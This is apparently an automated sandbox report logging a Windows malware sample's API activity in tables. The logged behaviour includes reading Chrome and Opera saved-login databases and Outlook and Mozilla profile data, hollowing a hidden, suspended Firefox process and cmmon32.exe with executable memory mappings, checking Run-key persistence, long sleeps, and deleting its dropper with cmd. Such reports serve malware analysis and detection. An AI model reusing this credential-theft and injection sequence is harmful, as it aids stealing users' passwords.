| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x0 |
|
1 | |
| COM | Create | interface = AFA0DC11-C313-11D0-831A-00C04FD5AE38, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\, value_name = CurrentVersion |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main, value_name = Install Directory |
|
1 | |
| Environment | Set Environment String | name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Mozilla Firefox, environment = 0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, base_address = 0xc0000135 |
|
1 | |
| Environment | Set Environment String | name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\, environment = 0 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird\ |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = extended |
|
1 | |
| Module | Load | module_name = winsqlite3.dll, base_address = 0xc0000135 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Module | Load | module_name = vaultcli.dll, base_address = 0x0 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini, offset = 0, size = 40 |
|
1 | |
| Module | Load | module_name = gdiplus.dll, base_address = 0x0 |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Mozilla Firefox\Firefox.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Program Files\Mozilla Firefox\Firefox.exe, type = extended |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Mozilla Firefox\Firefox.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Program Files\Mozilla Firefox\Firefox.exe, type = extended |
|
1 | |
| File | Read | filename = \??\C:\Program Files\Mozilla Firefox\Firefox.exe, offset = 0, size = 275568 |
|
1 | |
| Process | Create | process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, os_pid = 0xce4, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, show_window = SW_HIDE |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Memory | Read | process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, address = 0x7ffd9000, size = 32 |
|
1 | |
| Module | Map | process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, protection = PAGE_READWRITE, address_out = 0x1f0000 |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 2416732 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2aa0000 |
|
1 | |
| Module | Map | process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xbc0000 |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\cmmon32.exe |
|
1 | |
| Memory | Read | process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, address = 0x1240000, size = 278528 |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 2416784 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x690000 |
|
1 | |
| Module | Unmap | process_name = C:\Program Files\Mozilla Firefox\Firefox.exe |
|
1 | |
| Module | Map | process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1240000 |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\cmmon32.exe |
|
1 | |
| Thread | Resume | process_name = c:\windows\system32\cmmon32.exe, os_tid = 0xbd8 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| File | Create | filename = \??\C:\Program Files\Crfitq6x\gdigzvh.exe, desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Sleep | duration = 2418724 milliseconds (2418.724 seconds) |
|
1 |
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c del "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:11, Reason: Child Process |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:08 |
| Information | Value |
|---|---|
| PID | 0xc80 |
| Parent PID | 0xbd4 (c:\windows\system32\cmmon32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C84
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2017-12-20 14:27:33 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 131789 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x4a2d0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76c624c2 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 224, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76c10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76c4ac6c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c53ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76c62732 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6U8~1\AppData\Local\Temp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\program files\mozilla firefox\firefox.exe |
| Command Line | "C:\Program Files\Mozilla Firefox\Firefox.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:31 |
| Information | Value |
|---|---|
| PID | 0xce4 |
| Parent PID | 0xbd4 (c:\windows\system32\cmmon32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
CE8
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000040000 | 0x00040000 | 0x00042fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x000d3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x00bb3fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000bc0000 | 0x00bc0000 | 0x00cc9fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00d97fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000da0000 | 0x00da0000 | 0x00da6fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000db0000 | 0x00db0000 | 0x00db1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00ddffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000df0000 | 0x00df0000 | 0x00e2ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x00f30fff | Pagefile Backed Memory | Readable |
|
|
|
|
| ntdll.dll | 0x00f40000 | 0x0107bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000001130000 | 0x01130000 | 0x0113ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001140000 | 0x01140000 | 0x0123ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001240000 | 0x01240000 | 0x01283fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000001290000 | 0x01290000 | 0x01e8ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001f00000 | 0x01f00000 | 0x01ffffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02000000 | 0x022cefff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000022d0000 | 0x022d0000 | 0x026c2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| nss3.dll | 0x62940000 | 0x62af4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winmm.dll | 0x6e510000 | 0x6e541fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| freebl3.dll | 0x6f0f0000 | 0x6f13efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| softokn3.dll | 0x6f1f0000 | 0x6f216fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nssdbm3.dll | 0x71fe0000 | 0x71ff6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcr100.dll | 0x72000000 | 0x720bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcp100.dll | 0x720d0000 | 0x72138fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mozglue.dll | 0x72140000 | 0x72161fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wsock32.dll | 0x72170000 | 0x72176fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74ff0000 | 0x74ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x75110000 | 0x7511bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x75120000 | 0x7523cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75260000 | 0x752a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x75420000 | 0x754c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x754d0000 | 0x7556ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75810000 | 0x76459fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76460000 | 0x76469fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x76470000 | 0x7648efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x765d0000 | 0x7661dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x76620000 | 0x766e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76850000 | 0x768ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x768f0000 | 0x76908fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76b40000 | 0x76c0bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76c10000 | 0x76ce3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x76e40000 | 0x76eebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76f50000 | 0x7708bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x77090000 | 0x77095fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x770d0000 | 0x77104fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x77120000 | 0x77176fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x77190000 | 0x77190fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = \??\C:\Windows\SYSTEM32\ntdll.dll, desired_access = FILE_EXECUTE, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\program files\mozilla firefox\firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xf40000 |
|
1 |
